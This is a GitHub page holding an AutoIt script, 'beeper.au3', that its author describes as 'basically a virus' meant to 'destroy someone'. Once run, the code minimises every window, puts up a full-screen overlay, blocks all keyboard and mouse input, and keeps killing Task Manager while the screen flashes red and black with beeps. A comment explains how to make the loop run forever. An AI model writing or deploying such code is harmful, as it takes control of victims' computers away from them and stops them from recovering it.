-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathbeeper.au3
30 lines (26 loc) · 1.06 KB
/
beeper.au3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#cs ############################################################################
AutoIt Version: 3.3.8.1
Author: biodrone
Script Function:
To make weird things happen if you need to destroy someone
It's basically a virus...
#ce ############################################################################
#include <GUIConstantsEx.au3>
$loop = 0
$x = 1
WinMinimizeAll() ; minimize all other windows
GUICreate("LOL PWN TIME", 4000, 4000) ; create the GUI overlay for the screen
BlockInput(1) ; block all user input
while $loop < 200 ;controls how many times the screen flashes along with line 26
ProcessClose("taskmgr.exe")
GUISetState(@SW_SHOW) ;show the GUI
GUISetBkColor(0xFF0000) ;set the colour to black
MouseMove($loop, $loop + 1)
GUISetBkColor(0x000000) ;set the colour to red
For $x = 300 to 3000 step 300
Beep($x,1) ;make the weird beeping noise
Next
$loop = $loop + 1 ;comment this line out for an infinite loop
wend
; close all .exe's launched within the reign of destruction!
ProcessClose("cdtray.exe")